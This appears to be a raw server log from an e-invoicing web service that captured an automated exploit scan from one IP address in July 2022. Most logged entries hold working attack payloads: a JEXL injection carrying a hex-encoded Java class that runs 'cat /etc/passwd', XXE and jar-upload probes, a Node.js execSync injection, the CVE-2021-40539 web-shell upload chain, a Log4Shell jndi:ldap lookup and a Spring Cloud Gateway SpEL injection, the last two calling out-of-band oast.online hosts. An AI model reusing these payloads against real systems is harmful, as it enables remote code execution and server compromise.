x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
2022-07-12 23:16:41.0439|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:16:50.3762|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:16:53.9440|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:16:57.4977|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:17:01.1236|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:17:15.4365|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:18:12.1847|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 [
{
"DomainName": "113.161.87.66",
"EventCode": 4688,
"EventType": 0,
"TimeGenerated": 0,
"Task Content": " %xxe; ]>"
}
]
2022-07-12 23:18:22.6903|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:18:26.1748|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:18:43.5691|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 --8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="poc.jar"
Content-Type:application/octet-stream
2BqZOgFqIvCL96vnH8SoPXJmlbe
--8ce4b16b22b58894aa86c421e8759df3--
2022-07-12 23:19:02.2760|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:20:01.1753|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 getpwd=WorldFilledWithLove
2022-07-12 23:20:34.1850|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:21:05.0629|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:21:08.7700|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F2BqZOScds4F5WAKmU28rrx0MSlu.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
2022-07-12 23:21:20.8830|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:22:30.1261|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 --8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="methodToCall"
unspecified
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="Save"
yes
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="form"
smartcard
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="operation"
Add
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2021-40539";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i
--8b1ab266c41afb773af2e064bc526458--
2022-07-12 23:22:34.0879|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 --43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="methodToCall"
unspecified
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="Save"
yes
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="form"
smartcard
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="operation"
Add
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"
????���4�(
����
����������������������
������ ��!��"������()V���Code���LineNumberTable�����
StackMapTable�� ��
SourceFile���Si.java��
����#��$�%���java/lang/String���cmd���/c���copy���ws.jsp��*..\webapps\adssp\help\admin-guide\test.jsp��&�'���java/io/IOException���Si���java/lang/Object���java/lang/Runtime��
getRuntime���()Ljava/lang/Runtime;���exec��(([Ljava/lang/String;)Ljava/lang/Process;�!�������������
������������������*?��?�����������������������������d�������+?��K*�?��Y���SY���SY���SY���SY���S?� L?��K?�����&�)�
�������������������&���*����������i��������������
--43992a07d9a30213782780204a9f032b--
2022-07-12 23:22:37.8924|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22
2022-07-12 23:23:06.4160|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.cb6o5meg2jqcit800010mqu6hx94gz1xa.oast.online}","strict":true}
2022-07-12 23:23:29.0736|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 gM6Hvbjb
2022-07-12 23:23:34.4081|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:23:38.2225|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:24:32.7236|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:24:59.2217|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:25:26.2010|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:25:43.5341|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:26:04.5092|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:26:08.4218|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:26:25.1795|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/2BqZOi0i8fgwb2WRva76vOEDPib/**"
}
}
],
"filters": [
{
"name": "RewritePath",
"args": {
"_genkey_0": "#{T(java.net.InetAddress).getByName(\"cb6o5meg2jqcit8000104mcx7y5y4ucwp.oast.online\")}",
"_genkey_1": "/${path}"
}
}
],
"uri": "http://113.161.87.66",
"order": 0
}
2022-07-12 23:26:29.0992|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"predicate": "Paths: [/2BqZOi0i8fgwb2WRva76vOEDPib], match trailing slash: true",
"route_id": "2BqZOi0i8fgwb2WRva76vOEDPib",
"filters": [
"[[RewritePath #{T(java.net.InetAddress).getByName(\"cb6o5meg2jqcit800010krw61axan3hf4.oast.online\")} = /${path}], order = 1]"
],
"uri": "http://113.161.87.66",
"order": 0
}
2022-07-12 23:27:37.2404|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:28:20.6172|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 23:32:44.6274|INFO|EINVOICENET.WebService.ClsLog|185.102.170.48
2022-07-12 23:45:01.1939|INFO|EINVOICENET.WebService.ClsLog|31.220.1.83